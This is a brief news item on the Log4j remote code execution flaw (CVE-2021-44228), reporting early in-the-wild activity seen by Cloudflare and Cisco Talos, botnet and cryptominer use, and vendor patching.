Cloudflare CEO Matthew Prince has stated that the earliest evidence of the new Log4J exploit occurred on the first day of December. The vulnerability is a vicious flaw in the Java logging library Apache Log4j that allows unauthenticated remote code execution. The vulnerability allegedly existed in the wild 9 days before it was publicly disclosed, according to Prince’s report, however, there is no evidence of mass exploitation until after the flaw was confirmed to the public. Cisco Talos has also been tracking the vulnerability, stating in a recent blog post that it observed activity for the flaw as early as December 2. Individuals or companies looking for indicators that they have been compromised using the flaw, CVE-2021-44228, should look back at least two weeks.
According to security researchers, the Mirai botnet is also beginning to leverage the vulnerability. NetLab 360 reportedly observed the Log4j vulnerability being used to create Muhstik and Mirai botnets that targeted Linux devices. Vendors have been rushing to develop and release patches and workarounds for affected products due to the nature of the vulnerability. There are some patches available, such as for VMware and Cisco, however, many other vendors remain vulnerable. Both vendors scored the vulnerability as a perfect 10 on the CVSS severity scale. Sophos believes that the flaw is already being used by cryptominers.
Read More: Log4j RCE activity began on December 1 as botnets start using vulnerability